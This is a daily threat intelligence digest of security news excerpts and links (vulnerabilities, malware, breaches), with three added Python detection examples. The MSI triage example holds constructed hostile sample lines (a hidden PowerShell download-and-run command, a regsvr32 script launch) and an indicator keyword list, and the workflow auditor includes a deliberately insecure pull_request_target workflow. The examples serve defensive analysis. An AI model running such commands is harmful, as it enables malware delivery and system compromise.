Cyber Threat Intelligence 18 July 2024
Industrial Sector
- Defending OT Requires Agility, Proactive Controls
"Hackers affiliated with the Chinese government have reportedly kept access to US critical infrastructure for years, several agencies warned in February. The revelation is, at least on the surface, a heel-turn for Chinese cyber behavior — moving from espionage to the potential compromise or destruction of infrastructure via operational technology (OT). This includes the programmable systems and devices connected to physical environments."
https://www.darkreading.com/ics-ot-security/defending-ot-requires-agility-proactive-controls
New Tooling
- SubSnipe: Open-Source Tool For Finding Subdomains Vulnerable To Takeover
"SubSnipe is an open-source, multi-threaded tool to help find subdomains vulnerable to takeover. It’s simpler, produces better output, and has more fingerprints than other subdomain takeover tools."
https://www.helpnetsecurity.com/2024/07/17/subsnipe-open-source-tool-find-subdomains-vulnerable-takeover/
https://github.com/dub-flow/subsnipe
Vulnerabilities
- Cisco SSM On-Prem Bug Lets Hackers Change Any User's Password
"Cisco has fixed a maximum severity vulnerability that allows attackers to change any user's password on vulnerable Cisco Smart Software Manager On-Prem (Cisco SSM On-Prem) license servers, including administrators. The flaw also impacts SSM On-Prem installations earlier than Release 7.0, known as Cisco Smart Software Manager Satellite (SSM Satellite). As a Cisco Smart Licensing component, SSM On-Prem assists service providers and Cisco partners in managing customer accounts and product licenses."
https://www.bleepingcomputer.com/news/security/cisco-ssm-on-prem-bug-lets-hackers-change-any-users-password/
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
https://securityaffairs.com/165848/security/critical-flaw-cisco-ssm-on-prem.html
- Atlassian Patches High-Severity Vulnerabilities In Bamboo, Confluence, Jira
"Software vendor Atlassian on Tuesday released security-themed updates to fix several high-severity vulnerabilities in its Bamboo, Confluence and Jira products. The Australian firm called urgent attention to the Bamboo Data Center and Server updates that resolve two high-severity bugs, including one affecting the UriComponentsBuilder dependency that could allow an unauthenticated attacker to perform a server-side request forgery (SSRF) attack."
https://www.securityweek.com/atlassian-patches-high-severity-vulnerabilities-in-bamboo-confluence-jira/
- Chrome 126 Updates Patch High-Severity Vulnerabilities
"Google on Tuesday announced security updates for Chrome 126 that address ten vulnerabilities, including eight high-severity bugs reported by external researchers. Despite Google’s efforts to eliminate memory safety bugs in Chrome, most of the externally reported security defects are memory issues that could potentially lead to a sandbox escape and remote code execution."
https://www.securityweek.com/chrome-126-updates-patch-high-severity-vulnerabilities/
- Oracle Patches 240 Vulnerabilities With July 2024 CPU
"Oracle on Tuesday announced 386 new security patches as part of its July 2024 Critical Patch Update (CPU), including over 260 for unauthenticated, remotely exploitable vulnerabilities. SecurityWeek has identified roughly 240 unique CVEs in Oracle’s July 2024 CPU. More than two dozen security patches resolve critical-severity flaws."
https://www.securityweek.com/oracle-patches-240-vulnerabilities-with-july-2024-cpu/
- The Potential Impact Of The OpenSSH Vulnerabilities CVE-2024-6387 And CVE-2024-6409
"We check the OpenSSH vulnerabilities CVE-2024-6387 and CVE-2024-6409, examining their potential real-world impact and the possibility of exploitation for CVE-2024-6387 in x64 systems."
https://www.trendmicro.com/en_us/research/24/g/cve-2024-6387-and-cve-2024-6409.html
- CISA Adds Three Known Exploited Vulnerabilities To Catalog
"CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
CVE-2024-34102 Adobe Commerce and Magento Open Source Improper Restriction of XML External Entity Reference (XXE) Vulnerability
CVE-2024-28995 SolarWinds Serv-U Path Traversal Vulnerability
CVE-2022-22948 VMware vCenter Server Incorrect Default File Permissions Vulnerability"
https://www.cisa.gov/news-events/alerts/2024/07/17/cisa-adds-three-known-exploited-vulnerabilities-catalog
- Critical Splunk Vulnerability CVE-2024-36991: Patch Now To Prevent Arbitrary File Reads
"The SonicWall Capture Labs threat research team became aware of an arbitrary file read vulnerability affecting Splunk Enterprise installations. Identified as CVE-2024-36991 and given a CVSSv3 score of 7.5, the vulnerability is more severe than it initially appeared. Labeled as a path traversal vulnerability and categorized as CWE-35, this vulnerability allows attackers to traverse the file system to access files or directories outside the restricted directory. Splunk software uses computer-generated data to track, scan, analyze and visualize it in real-time. It is used for business and web analytics, application management, compliance, and security."
https://blog.sonicwall.com/en-us/2024/07/critical-splunk-vulnerability-cve-2024-36991-patch-now-to-prevent-arbitrary-file-reads/
- Attacking Connection Tracking Frameworks As Used By Virtual Private Networks
"VPNs (Virtual Private Networks) have become an essential privacy-enhancing technology, particularly for at-risk users like dissidents, journalists, NGOs, and others vulnerable to targeted threats. While previous research investigating VPN security has focused on cryptographic strength or traffic leakages, there remains a gap in understanding how lower-level primitives fundamental to VPN operations, like connection tracking, might undermine the security and privacy that VPNs are intended to provide."
https://petsymposium.org/popets/2024/popets-2024-0070.php
https://petsymposium.org/popets/2024/popets-2024-0070.pdf
Malware
- Critical Apache HugeGraph Vulnerability Under Attack - Patch ASAP
"Threat actors are actively exploiting a recently disclosed critical security flaw impacting Apache HugeGraph-Server that could lead to remote code execution attacks. Tracked as CVE-2024-27348 (CVSS score: 9.8), the vulnerability impacts all versions of the software before 1.3.0. It has been described as a remote command execution flaw in the Gremlin graph traversal language API."
https://thehackernews.com/2024/07/critical-apache-hugegraph-vulnerability.html
https://www.securityweek.com/apache-hugegraph-vulnerability-exploited-in-wild/
- Attacks On Israeli Orgs 'More Than Doubled' Since October 7, Cyber Researcher Says
"Israeli organizations have seen a "dramatic increase" in cyberattacks since the October 7 terrorist attack, with some organizations experiencing a constant bombardment of intrusion attempts, according to military officials and cybersecurity researchers working in the country. Gil Messing, the chief of staff at Tel Aviv-based Check Point Software, told Recorded Future News that the cyberattacks on Israeli organizations are driven mostly by politically-motivated groups, such as hackers affiliated with Iran and Hezbollah as well as hacktivists."
https://therecord.media/attacks-israeli-orgs-double
https://www.darkreading.com/cloud-security/idf-has-rebuffed-3b-cloud-cyberattacks-since-oct-7-colonel-claims
https://www.timesofisrael.com/idf-computer-chief-3-billion-cyber-attacks-against-israel-since-beginning-of-war/
- FIN7 Reboot | Cybercrime Gang Enhances Ops With New EDR Bypasses And Automated Attacks
"FIN7, an elusive and persistent financially motivated threat group with origins in Russia, has been active since 2012, targeting various industry sectors and causing substantial financial losses in industries such as hospitality, energy, finance, high-tech and retail."
https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/
https://www.bleepingcomputer.com/news/security/notorious-fin7-hackers-sell-edr-killer-to-other-threat-actors/
https://thehackernews.com/2024/07/fin7-group-advertises-security.html
https://therecord.media/fin7-selling-avneutralizer-tool-darknet-cybercrime
https://www.darkreading.com/endpoint-security/security-end-run-aukill-shuts-down-windows-reliant-edr-processes
- Private HTS Program Continuously Used In Attacks
"AhnLab SEcurity intelligence Center (ASEC) has previously covered a case where Quasar RAT was distributed through private home trading systems (HTS) in the blog post “Quasar RAT Being Distributed by Private HTS Program“. The same threat actor has been continuously distributing malware, and attack cases have been confirmed even recently."
https://asec.ahnlab.com/en/67969/
- SEG Vs. SEG: How Threat Actors Are Pitting Email Security Products Against Each Other With Encoded URLs
"Email security tools such as Secure Email Gateways (SEGs) often encode URLs that are embedded in emails. This enables the security appliance to scan the URL before the recipient visits the website. Oftentimes when SEGs detect URLs in emails that are already SEG encoded they do not scan the URLs, or the scanning shows only the security tool’s scanning page and not the actual destination. As a result, when an email already has SEG encoded URLs the recipient’s SEG often allows the email through without properly checking the embedded URLs."
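The pass-through described above is easy to catch once a gateway (or a SOC script post-processing mail logs) unwraps rewritten links instead of trusting them. The following is an added example for this digest, not code from Cofense or from any SEG vendor: it peels nested rewrites and flags any URL that arrives already wrapped. The two decodable formats are assumptions drawn from their publicly observable shape (Microsoft Defender Safe Links `https://<region>.safelinks.protection.outlook.com/?url=<percent-encoded>` and Proofpoint URL Defense v2 `https://urldefense.proofpoint.com/v2/url?u=<v2-encoded>`); opaque rewriters such as `protect-*.mimecast.com/s/<token>` cannot be decoded offline and are routed to detonation. The sample URLs are constructed, not captured from a campaign.

```python
"""Unwrap SEG-rewritten URLs and flag mail that arrives pre-encoded.

Added example, not vendor code. Format knowledge is an assumption:
  Safe Links      : host *.safelinks.protection.outlook.com, query 'url='
  Proofpoint v2   : host urldefense.proofpoint.com, path /v2/url, query 'u='
                    where '_' stands for '/' and '-XX' is a hex-escaped byte
  Mimecast (opaque): host protect-*.mimecast.com, token only, not decodable
"""
import re
from urllib.parse import urlparse, parse_qs

SAFELINKS_HOST = re.compile(r"(^|\.)safelinks\.protection\.outlook\.com$")
PROOFPOINT_HOST = "urldefense.proofpoint.com"
OPAQUE_REWRITERS = (re.compile(r"^protect-[a-z0-9]+\.mimecast\.com$"),)


def _decode_proofpoint_v2(u: str) -> str:
    # Restore '/' first so that '-5F' (a literal underscore) is not
    # turned into a slash by a second pass.
    s = u.replace("_", "/")
    return re.sub(r"-([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


def unwrap_once(url: str):
    """Return (inner_url, rewriter) or (None, None) if url is not a known rewrite."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    qs = parse_qs(p.query)  # parse_qs already percent-decodes values once
    if SAFELINKS_HOST.search(host) and "url" in qs:
        return qs["url"][0], "safelinks"
    if host == PROOFPOINT_HOST and p.path == "/v2/url" and "u" in qs:
        return _decode_proofpoint_v2(qs["u"][0]), "proofpoint-v2"
    for pat in OPAQUE_REWRITERS:
        if pat.match(host):
            return None, "opaque-rewriter"
    return None, None


def unwrap(url: str, max_depth: int = 5):
    """Peel nested rewrites. Returns (innermost_url, rewriters_seen, opaque)."""
    seen, current = [], url
    for _ in range(max_depth):
        inner, name = unwrap_once(current)
        if name == "opaque-rewriter":
            return current, seen + [name], True
        if inner is None:
            break
        seen.append(name)
        current = inner
    return current, seen, False


def assess_inbound(url: str, our_seg: str):
    """Verdict for a URL in an *inbound* message at the SEG named our_seg.

    A link that is already wrapped on arrival is a red flag: the wrapper
    belongs either to another product (the sender's gateway, or an attacker
    replaying a rewrite) or to our own product, which means our own scan
    stage is being skipped. The innermost destination is what must be scanned.
    """
    final, layers, opaque = unwrap(url)
    if not layers:
        return {"final": final, "verdict": "scan", "reason": "plain url"}
    if opaque:
        return {"final": final, "verdict": "detonate",
                "reason": "opaque rewriter; follow in a sandbox"}
    reason = "nested seg encoding (%s)" % ">".join(layers)
    if our_seg in layers:
        reason = "arrived pre-encoded with our own %s wrapper" % our_seg
    return {"final": final, "verdict": "scan-inner", "reason": reason}


# Constructed samples (evil.example is an RFC 2606 reserved name).
SAMPLES = [
    "https://example.com/invoice",
    "https://nam02.safelinks.protection.outlook.com/?url=https%3A%2F%2Fevil.example%2Flogin%3Fid%3D7&data=05%7C01",
    "https://urldefense.proofpoint.com/v2/url?u=https-3A__nam02.safelinks.protection.outlook.com_-3Furl-3Dhttps-253A-252F-252Fevil.example-252Fdrop&d=DwMFaQ",
    "https://protect-eu.mimecast.com/s/AbCdEfGh",
]

if __name__ == "__main__":
    for u in SAMPLES:
        print(assess_inbound(u, "proofpoint-v2"))
```

The third sample is the double-wrapped case from the article: a Proofpoint wrapper around a Safe Links wrapper around the real destination. A gateway that stops at the first layer it recognises never sees `evil.example`.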
https://cofense.com/blog/seg-vs-seg-how-threat-actors-are-pitting-email-security-products-against-each-other/
https://www.darkreading.com/cyberattacks-data-breaches/threat-actors-ramp-up-use-of-encoded-urls-to-bypass-secure-email
- DPRK Hackers Tweak Malware To Lure MacOS Users Into Video Calls
"Well known for targeting victims with fake job postings, North Korea state-sponsored hackers have been discovered using a new variant of their BeaverTail malware to trick macOS users into downloading a malicious version of Microtalk, a video-calling service. Details about the latest campaign were published by cybersecurity researcher Patrick Wardle, who explained in his writeup that the threat actors likely lured their victims into downloading the updated BeaverTail-infected version of Microtalk by asking them to join a job interview."
https://www.darkreading.com/threat-intelligence/dprk-hackers-tweak-malware-to-lure-macos-users-into-video-calls
https://objective-see.org/blog/blog_0x7A.html
https://thehackernews.com/2024/07/north-korean-hackers-update-beavertail.html
- Deep Dive: Exposing Stealthy New BlackSuit Ransomware
"Five weeks ago, the KADOKAWA corporation began to experience service outages affecting multiple websites. The outages spread to other operations and were identified as a ransomware attack by the BlackSuit ransomware group. BlackSuit claimed responsibility and threatened the public release of stolen information on July 1st unless their ransom demands were met."
https://www.deepinstinct.com/blog/deep-dive-exposing-stealthy-new-blacksuit-ransomware
- Qilin Revisited: Diving Into The Techniques And Procedures Of The Recent Qilin Ransomware Attacks
"Let’s revisit the Qilin ransomware group, which recently drew considerable attention due to an attack on the healthcare sector. The highest ransom demand they issued was $50 million during their assault on Synnovis, a pathology services provider. This attack had profound impacts on several key NHS hospitals in London. First identified in July 2022, Qilin has rapidly gained notoriety by launching its Ransomware-as-a-Service (RaaS) operations on underground forums as of February 2023."
https://www.group-ib.com/blog/qilin-revisited/
https://www.infosecurity-magazine.com/news/qilin-ransomwares-tactics-unveiled/
- NullBulge | Threat Actor Masquerades As Hacktivist Group Rebelling Against AI
"Between April and June 2024, the NullBulge group emerged targeting users in AI-centric application and gaming communities. The NullBulge persona has showcased creative methods of distributing malware targeting said tools and platforms. Though the group projects an image of activism claiming to be “protecting artists around the world” and claims to be motivated by a pro-art, anti-AI cause, rather than profit, other activities tied to this threat actor may indicate otherwise."
https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
https://www.infosecurity-magazine.com/news/nullbulge-anti-ai-hacktivist-group/
- How To Analyze Malicious MSI Installer Files
"Threat actors choose to use MSI installers to deliver and execute malicious payloads because these files can embed harmful executables and scripts within legitimate-looking packages, evading detection. They can abuse custom actions within MSI files to run malicious code during installation and configure the installers to download additional malware from remote servers. By masquerading as legitimate software, attackers trick users into executing these files."
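The custom actions the excerpt mentions live in the package's CustomAction table, and the interesting part of each row is its numeric Type: the low six bits say what kind of thing runs (native DLL, EXE, inline VBScript/JScript, a property assignment) and the high bits say when and as whom (deferred in the install script, with or without impersonation, with the target hidden from the log). The following triage helper is an added example for this digest, not Intezer's tooling; the type constants follow Microsoft's published CustomAction type definitions, the rows are constructed rather than dumped from a real sample, and on a live file you would feed it the rows exported from the table (for example with msitools' `msiinfo export <file.msi> CustomAction`, assumed available; Python's `msilib` is Windows-only).

```python
"""Decode and rank MSI CustomAction rows by risk.

Added example, not vendor code. Type bit layout per Microsoft's
CustomAction documentation; sample rows are constructed.
"""
BASE_TYPES = {
    1: "DLL stored in Binary table",        2: "EXE stored in Binary table",
    5: "JScript stored in Binary table",    6: "VBScript stored in Binary table",
    17: "DLL from installed file",          18: "EXE from installed file",
    19: "error message / abort",            21: "JScript from installed file",
    22: "VBScript from installed file",     34: "EXE with working directory",
    35: "set directory",                    37: "JScript text in Target column",
    38: "VBScript text in Target column",   50: "EXE path from property",
    51: "set property",                     53: "JScript text from property",
    54: "VBScript text from property",
}
# Option flags carried in the high bits of Type.
FLAG_CONTINUE = 0x0040        # ignore the action's return code
FLAG_ASYNC = 0x0080           # run asynchronously
FLAG_IN_SCRIPT = 0x0400       # deferred: runs inside the install script
FLAG_ROLLBACK = 0x0100        # meaning only valid together with IN_SCRIPT
FLAG_COMMIT = 0x0200          # meaning only valid together with IN_SCRIPT
FLAG_NO_IMPERSONATE = 0x0800  # deferred action runs as LocalSystem
FLAG_HIDE_TARGET = 0x2000     # Target column kept out of the install log

NON_CODE_TYPES = {19, 35, 51}
# Strings in the Target column that make an EXE/script action worth a closer look.
TARGET_IOCS = ("powershell", "cmd /c", "http://", "https://", "certutil", "mshta",
               "rundll32", "regsvr32", "wscript.shell")


def decode_type(t: int) -> dict:
    base = t & 0x3F
    flags = []
    if t & FLAG_CONTINUE:
        flags.append("continue")
    if t & FLAG_ASYNC:
        flags.append("async")
    if t & FLAG_IN_SCRIPT:
        flags.append("deferred")
        if t & FLAG_ROLLBACK:
            flags.append("rollback")
        if t & FLAG_COMMIT:
            flags.append("commit")
        if t & FLAG_NO_IMPERSONATE:
            flags.append("no-impersonate(LocalSystem)")
    if t & FLAG_HIDE_TARGET:
        flags.append("hide-target")
    return {"base": base, "kind": BASE_TYPES.get(base, "unknown"), "flags": flags}


def triage(rows):
    """rows: iterable of (Action, Type, Source, Target) as stored in the table.
    Returns findings sorted highest risk first."""
    findings = []
    for action, typ, source, target in rows:
        d = decode_type(typ)
        score, notes = 0, []
        if d["base"] in BASE_TYPES and d["base"] not in NON_CODE_TYPES:
            score += 2
            notes.append("executes code: " + d["kind"])
        if "no-impersonate(LocalSystem)" in d["flags"]:
            score += 2
            notes.append("runs as LocalSystem")
        if "hide-target" in d["flags"]:
            score += 1
            notes.append("target hidden from install log")
        for ioc in TARGET_IOCS:
            if ioc in target.lower():
                score += 2
                notes.append("suspicious Target contains %r" % ioc)
                break
        findings.append({"action": action, "type": typ, "source": source,
                         "score": score, "decoded": d, "notes": notes})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# Constructed rows; example.invalid is a reserved name.
SAMPLE_ROWS = [
    ("SetTARGETDIR", 51, "TARGETDIR", "[ProgramFilesFolder]Vendor"),
    ("LaunchHelper", 1218, "helper.exe", "/quiet"),
    ("RunStage2", 3106, "INSTALLDIR",
     'cmd /c powershell -w hidden -c "iwr https://example.invalid/s2 -o %TEMP%\\s2.exe"'),
    ("DropSct", 1062, "", 'CreateObject("WScript.Shell").Run "regsvr32 /s /u /i:[TEMP]p.sct scrobj.dll", 0'),
    ("FailIfOld", 19, "", "Windows 7 or later is required"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f["score"], f["action"], f["decoded"]["kind"], f["decoded"]["flags"], f["notes"])
```

3106 decodes to type 34 plus deferred plus no-impersonate, the classic shape of a command line that runs as LocalSystem during installation; 1218 is type 2 with continue, async and deferred, so a failure of the dropped EXE does not abort the install.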
https://intezer.com/blog/incident-response/how-to-analyze-malicious-msi-installer-files/
- Italian Government Agencies And Companies In The Target Of A Chinese APT
"On June 24 and July 2, 2024, two targeted attacks on Italian companies and government entities were observed, carried out by a Chinese cyber actor exploiting a variant of Rat 9002 in diskless mode. Other variants have over time been named Rat 3102. These activities are associated with the APT17 group, also known as "DeputyDog". The first campaign on June 24, 2024 used an Office document, while the second campaign contained a link. Both campaigns invited the victim to install a Skype for Business package from a link on an Italian government-like domain in order to deliver a variant of Rat 9002."
https://www.tgsoft.it/news/news_archivio.asp?id=1557&lang=eng
https://thehackernews.com/2024/07/china-linked-apt17-targets-italian.html
- The Return Of Ghost Emperor's Demodex
"During Sygnia’s analysis of the forensic findings extracted from the victim’s environment, the team found strong resemblance to the multi-stage tool which was described in Kaspersky’s blog from 2021. However, our investigation yielded some alterations in the infection chain and a slightly different C++ DLL variant."
https://www.sygnia.co/blog/ghost-emperor-demodex-rootkit/
https://therecord.media/ghostemperor-spotted-first-time-in-two-years
Breaches/Hacks/Leaks
- Over 400,000 Life360 User Phone Numbers Leaked Via Unsecured API
"A threat actor has leaked a database containing the personal information of 442,519 Life360 customers collected by abusing a flaw in the login API. Known only by their 'emo' handle, they said the unsecured API endpoint used to steal the data provided an easy way to verify each impacted user's email address, name, and phone number. "When attempting to login to a life360 account on Android the login endpoint would return the first name and phone number of the user, this existed only in the API response and was not visible to the user," emo said."
https://www.bleepingcomputer.com/news/security/over-400-000-life360-user-phone-numbers-leaked-via-unsecured-android-api/
- Yacht Giant MarineMax Data Breach Impacts Over 123,000 People
"MarineMax, self-described as the world's largest recreational boat and yacht retailer, is notifying over 123,000 individuals whose personal information was stolen in a March security breach claimed by the Rhysida ransomware gang. The company operates over 130 locations, including 83 dealerships and 66 marinas and storage facilities worldwide. Last year, it reported $2.39 billion in revenue and a $835.3 million gross profit."
https://www.bleepingcomputer.com/news/security/yacht-giant-marinemax-data-breach-impacts-over-123-000-people/
https://securityaffairs.com/165843/data-breach/marinemax-data-breach.html
- Family Location Tracker App Life360 Breach: 443,000 Users' Data Leaked
"Life360, a popular family location tracker app, suffered a data breach affecting 443,000 users. Personal details, including first names and phone numbers, were leaked. Learn about the breach, potential risks, and protective measures."
https://hackread.com/family-location-tracker-app-life360-breach-data-leak/
- MNGI Digestive Health Data Breach Impacts 765,000 Individuals
"MNGI Digestive Health is notifying over 765,000 individuals that their personal information was compromised in an August 2023 data breach. The incident occurred on August 20, 2023, but it took MNGI almost one year to determine that personal and protected health information was accessed."
https://www.securityweek.com/mngi-digestive-health-data-breach-impacts-765000-individuals/
- Hackers Claim Possession Of Four Million U Mobile User Data (Updated)
"Recently, Bloomberg reported that local telco U Mobile may be getting bought out by fellow telco Maxis. So it’s probably not so good a time to also learn that a hacker has claimed to have breached the security system of the former, making away with personal data of about four million customers."
https://www.lowyat.net/2024/326879/hackers-possession-u-mobile-data/
General News
- Overlooked Essentials: API Security Best Practices
"In this Help Net Security, Ankita Gupta, CEO at Akto, discusses API security best practices, advocating for authentication protocols like OAuth 2.0 and OpenID Connect, strict HTTPS encryption, and the use of JWTs for stateless authentication."
https://www.helpnetsecurity.com/2024/07/17/ankita-gupta-akto-api-security-best-practices/
- Most GitHub Actions Workflows Are Insecure In Some Way
"Most GitHub Actions are susceptible to exploitation; they are overly privileged or have risky dependencies, according to Legit Security."
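"Overly privileged" and "risky dependencies" map to concrete, greppable workflow properties: a `GITHUB_TOKEN` with `write-all` or no `permissions:` block at all, third-party actions referenced by a mutable tag or branch instead of a commit SHA, a `pull_request_target` trigger that checks out the PR head, and attacker-controlled event fields (PR title, branch name, issue body) interpolated straight into a `run:` step. The checker below is an added example for this digest, not Legit Security's scanner; it works on the workflow text with a small line-state machine rather than a YAML parser, so it needs no third-party module. Both workflows are constructed, `example-org/setup-tool` is fictional, and the 40-hex value in the hardened version is a placeholder, not the real commit behind any `actions/checkout` tag.

```python
"""Audit a GitHub Actions workflow for the common over-privilege patterns.

Added example, not vendor tooling. Regex/line-based on purpose so it runs
with the standard library only; a real scanner would use a YAML parser.
"""
import re

SHA_PIN = re.compile(r"^[0-9a-f]{40}$")
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.M)
PERM_RE = re.compile(r"^\s*permissions:\s*(.*)$", re.M)
RUN_LINE_RE = re.compile(r"^\s*(-\s*)?run:")
# Any event payload field, and github.head_ref, may be attacker-controlled
# on pull_request / issue events; flag them inside shell commands.
UNTRUSTED_EXPR = re.compile(r"\$\{\{\s*github\.(event\.|head_ref)")


def find_run_injections(text: str):
    """Line numbers where a run: step interpolates an untrusted expression."""
    hits, in_run, run_col = [], False, 0
    for n, line in enumerate(text.splitlines(), 1):
        indent = len(line) - len(line.lstrip(" "))
        if in_run and (line.strip() == "" or indent > run_col):
            body = line                      # continuation of a block scalar
        elif RUN_LINE_RE.match(line):
            in_run, run_col = True, line.index("run:")
            body = line.split("run:", 1)[1]
        else:
            in_run = False
            continue
        if UNTRUSTED_EXPR.search(body):
            hits.append(n)
    return hits


def audit_workflow(text: str):
    findings = []
    for m in USES_RE.finditer(text):                      # 1. pinning
        ref = m.group(1)
        if ref.startswith(("./", "docker://")):
            continue
        _, _, version = ref.partition("@")
        if not SHA_PIN.match(version):
            findings.append("unpinned action %s: pin to a full commit SHA" % ref)
    perms = PERM_RE.findall(text)                          # 2. token scope
    if not perms:
        findings.append("no permissions: block; GITHUB_TOKEN gets the repository default")
    elif any(p.strip() == "write-all" for p in perms):
        findings.append("permissions: write-all grants every scope to GITHUB_TOKEN")
    if re.search(r"^\s*pull_request_target\b", text, re.M) and \
            re.search(r"github\.event\.pull_request\.head\.(sha|ref)", text):   # 3. pwn request
        findings.append("pull_request_target checks out the PR head: untrusted code runs with a write token")
    for ln in find_run_injections(text):                   # 4. script injection
        findings.append("line %d: untrusted github.event data interpolated into a shell command" % ln)
    return findings


WEAK = """\
name: pr-check
on:
  pull_request_target:
    types: [opened, synchronize]
permissions: write-all
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: example-org/setup-tool@main
      - run: echo "Checking ${{ github.event.pull_request.title }}"
      - run: |
          make test
"""

HARDENED = """\
name: pr-check
on:
  pull_request:
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567  # placeholder SHA
      - name: Title check
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: echo "Checking $PR_TITLE"
"""

if __name__ == "__main__":
    for name, wf in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_workflow(wf) or ["clean"])
```

The hardened version keeps the same functionality: the PR title still reaches the step, but through an environment variable, so it is data to the shell rather than part of the command line, and the token can only read the repository.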
https://www.helpnetsecurity.com/2024/07/17/insecure-github-actions-workflows/
- The Three Conversations Every CISO Needs To Have
"A CISO needs to be many things. One of the most important, and possibly underestimated, is the need to be a good storyteller. It can be hard for non-technical senior managers to understand the cyber risks facing their organization. Just over a third (35%) of the smaller businesses surveyed for a recent international study said that senior managers don’t see cyberattacks as a significant risk — although a quarter admit that leaders aren’t kept up to date about threats facing the organization."
https://blog.barracuda.com/2024/07/17/three-conversations-every-ciso-needs
https://www.barracuda.com/reports/ciso-script
- Ransomware Attacks Are Hitting Energy, Oil And Gas Sectors Especially Hard, Report Finds
"Ransomware attacks are hitting energy and oil and gas sectors harder, costing utilities more in recovery time and funding as victims appear increasingly willing to pay ransom demands, according to a new report from the cybersecurity firm Sophos."
https://cyberscoop.com/ransomware-energy-oil-gas-report/
https://assets.sophos.com/X24WTUEQ/at/75tnw38cqsnrrv56wpwc78k/sophos-state-of-ransomware-critical-infrastructure-2024.pdf
https://www.theregister.com/2024/07/17/ransomware_continues_to_pile_on/
- INTERPOL Operation Strikes Major Blow Against West African Financial Crime
"A global law enforcement operation targeting West African organized crime groups, including Black Axe, has led to hundreds of arrests, the seizure of assets worth USD 3 million, and the dismantling of multiple criminal networks around the world. Operation Jackal III, which ran from 10 April to 3 July across 21 countries on five continents, targeted online financial fraud and the West African syndicates behind it. The annual operation resulted in some 300 arrests, the identification of over 400 additional suspects, and the blocking of more than 720 bank accounts."
https://www.interpol.int/en/News-and-Events/News/2024/INTERPOL-operation-strikes-major-blow-against-West-African-financial-crime
https://therecord.media/interpol-operation-west-africa-cyber-fraud-300-arrested
https://www.darkreading.com/cybersecurity-operations/west-african-crime-syndicate-taken-down-by-interpol-operation
https://www.infosecurity-magazine.com/news/global-police-black-axe-cybercrime/
https://cyberscoop.com/300-arrests-made-in-crackdown-of-west-african-cyber-fraud-group/
https://www.securityweek.com/interpol-arrests-300-people-in-a-global-crackdown-on-west-african-crime-groups-across-5-continents/
- Orgs Are Finally Making Moves To Mitigate GenAI Risks
"Many enterprise security teams finally appear to be catching up with the runaway adoption of AI-enabled applications in their organizations since the public release of ChatGPT 18 months ago. A new analysis by Netskope of anonymized AI app usage data from customer environments showed substantially more organizations have begun using blocking controls, data loss prevention (DLP) tools, live coaching, and other mechanisms to mitigate risk."
https://www.darkreading.com/threat-intelligence/orgs-are-finally-making-moves-to-mitigate-genai-risks
https://www.infosecurity-magazine.com/news/sensitive-data-sharing-genai/
- Dark Web Shows Cybercriminals Ready For Olympics. Are You?
"Major sporting events like the World Cup, Super Bowl, and Wimbledon attract millions, even billions, of viewers. Argentina’s shootout win over France in the final game of the Qatar 2022 World Cup reached a global audience of 1.5 billion viewers. And the Olympics, starting later this month in Paris, is the biggest of them all—with the 2020 Tokyo Olympics having attracted a worldwide audience of over 3 billion viewers."
https://www.fortinet.com/blog/threat-research/dark-web-shows-cybercriminals-ready-for-olympics
https://www.fortinet.com/resources/reports/fortirecon-threat-intelligence-report-summer-olympics
https://www.infosecurity-magazine.com/news/paris-2024-olympics-face/
- Ukraine Police Arrest Suspected Cybercriminals Accused Of Theft From Industrial Companies
"Ukrainian law enforcement has arrested suspected cybercriminals accused of stealing from some of the country’s “leading industrial enterprises.” According to a cyber police report on Wednesday, the suspects infected employees’ computers with malicious software to gain remote access to their financial systems and changed their banking details to accounts controlled by the hackers."
https://therecord.media/ukraine-police-arrest-suspected-cybercriminals-theft
- The Biggest Data Breaches In 2024: 1 Billion Stolen Records And Rising
"We’re over halfway through 2024, and already this year we have seen some of the biggest, most damaging data breaches in recent history. And just when you think that some of these hacks can’t get any worse, they do. From huge stores of customers’ personal information getting scraped, stolen and posted online, to reams of medical data covering most people in the United States getting stolen, the worst data breaches of 2024 to date have already surpassed at least 1 billion stolen records and rising. These breaches not only affect the individuals whose data was irretrievably exposed, but also embolden the criminals who profit from their malicious cyberattacks."
https://techcrunch.com/2024/07/16/2024-in-data-breaches-1-billion-stolen-records-and-rising/
Reference
Electronic Transactions Development Agency (ETDA)